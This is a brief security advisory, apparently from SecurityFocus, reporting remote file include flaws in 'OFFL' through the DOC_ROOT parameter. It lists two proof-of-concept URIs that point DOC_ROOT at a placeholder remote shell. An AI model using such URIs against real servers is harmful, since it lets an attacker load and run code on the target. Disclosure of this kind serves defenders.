OFFL DOC_ROOT Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/lib/functions.php?DOC_ROOT=[Shell]
http://www.example.com/[path]/lib/header.php?DOC_ROOT=[Shell]


 

Privacy Statement
Copyright 2010, SecurityFocus